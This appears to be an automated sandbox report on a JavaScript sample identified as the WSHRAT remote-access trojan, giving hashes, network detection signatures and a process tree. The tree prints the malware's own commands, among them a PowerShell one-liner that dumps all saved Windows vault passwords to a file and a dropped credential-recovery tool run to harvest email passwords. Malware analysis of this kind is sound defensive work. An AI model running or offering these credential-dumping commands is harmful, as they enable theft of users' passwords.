Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    01/10/2021, 10:33

General

  • Target

    Scan0032.js

  • Size

    1.1MB

  • MD5

    126c1417ab24cd6b4bf8889a5254ae18

  • SHA1

    b9465bbe07f047f063f8e2a2e3dba87181fceac6

  • SHA256

    bd1b9e3102b57857d294df0339682f25e2ccb17d0665c77dfefe6565a68f85ff

  • SHA512

    bca88a55671be0e903f9ddaa9002dc37ba0c97f7c15431f09069c3740c41e5702fafa900bdaf0a0d436fc6bd50c669e4a22a70ac28b909ddc98726da24959a55

Malware Config

Signatures

  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

  • suricata: ET MALWARE WSHRAT CnC Checkin

    suricata: ET MALWARE WSHRAT CnC Checkin

  • suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound

    suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound

  • suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

    suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • Blocklisted process makes network request 23 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 2 IoCs
  • Script User-Agent 21 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0032.js
    1⤵
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2700
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe
        C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        PID:768
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3748
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3680
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM cmdc.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2416
    • C:\Users\Admin\AppData\Local\Temp\cmdc.exe
      "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
      2⤵
      • Executes dropped EXE
      PID:3832
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
      2⤵
        PID:2756
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
      1⤵
        PID:2244

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2700-134-0x0000028553026000-0x0000028553028000-memory.dmp

        Filesize

        8KB

      • memory/2700-125-0x000002853AE50000-0x000002853AE51000-memory.dmp

        Filesize

        4KB

      • memory/2700-132-0x0000028552FD0000-0x0000028552FD1000-memory.dmp

        Filesize

        4KB

      • memory/2700-124-0x0000028553023000-0x0000028553025000-memory.dmp

        Filesize

        8KB

      • memory/2700-123-0x0000028553020000-0x0000028553022000-memory.dmp

        Filesize

        8KB

      • memory/2700-122-0x00000285531B0000-0x00000285531B1000-memory.dmp

        Filesize

        4KB

      • memory/2700-119-0x000002853AE10000-0x000002853AE11000-memory.dmp

        Filesize

        4KB